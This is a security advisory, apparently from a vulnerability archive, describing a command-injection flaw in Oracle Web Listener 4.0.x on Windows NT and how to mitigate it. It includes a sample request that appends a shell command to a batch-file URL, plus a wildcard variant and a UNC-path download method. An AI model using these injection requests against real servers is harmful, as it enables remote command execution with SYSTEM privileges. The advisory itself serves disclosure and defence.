COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle Web Listener 4.0.x on Windows NT

PROBLEM

    Following  is  based  on  Cerberus  Information  Security Advisory
    (CISADV000315).   The  Cerberus  Security  Team  has  discovered a
    number of issues  with Oracle's Web  Listener, part of  the Oracle
    Application  Server,  that  can  allow  a  remote  attacker to run
    arbitrary commands on the web server

    Part of the  problem is caused  by default settings  after OAS has
    been installed.  The "ows-bin" virtual directory on an Oracle  Web
    Listener is the equivalent of  the "cgi-bin" on other web  servers
    and  by  default  this  is  set  to  C:\orant\ows\4.0\bin  -  this
    directory not  only contains  a number  of batch  files, DLLs  and
    executables  but  also  the  binary  image  file  for the Listener
    itself.   Even if  this default  setting has  been changed however
    you  may  still  be  at  risk  if  you have batch files in the new
    "ows-bin" directory.

    The Oracle Web  Listener will execute  batch files as  CGI scripts
    and by making a request to a batch file that requires one or  more
    arguments  it  is  possible  to  execute  any command the attacker
    wants  by  building  a  special  query  string.   For  example the
    following will give a directory listing:

        http://charon/ows-bin/perlidlc.bat?&dir

    It is even possible to use UNC paths so the Listener will  connect
    to the remote machine over NBSession, download the executable  and
    then execute it.

    By default the  Web Listener process  runs in security  context of
    SYSTEM   so  any  commands  issued  by  an  attacker will run with
    SYSTEM privileges.

    Another problem is that the Listener will expand the "*" character
    so even if the attacker doesn't know the name of a real batch file
    in the "ows-bin" they can request *.bat?&command

    Some of the executables  in the default directory  allow attackers
    to  kill  services,  return  configuration  information  and cause
    other undesirable events to occur.

SOLUTION

    Due to the severity of  this problem Cerberus recommends that  the
    following be actioned  immediately.  If  "ows-bin" is the  default
    then  using  the  Oracle  Application  Server  Manager  remove the
    ows-bin virtual directory or point it to a more benign  directory.
    If "ows-bin"  is not  the default  then verfiy  that there  are no
    batch files in this  directory.  A check  for this has been  added
    to Cerberus' security scanner, CIS available from their website.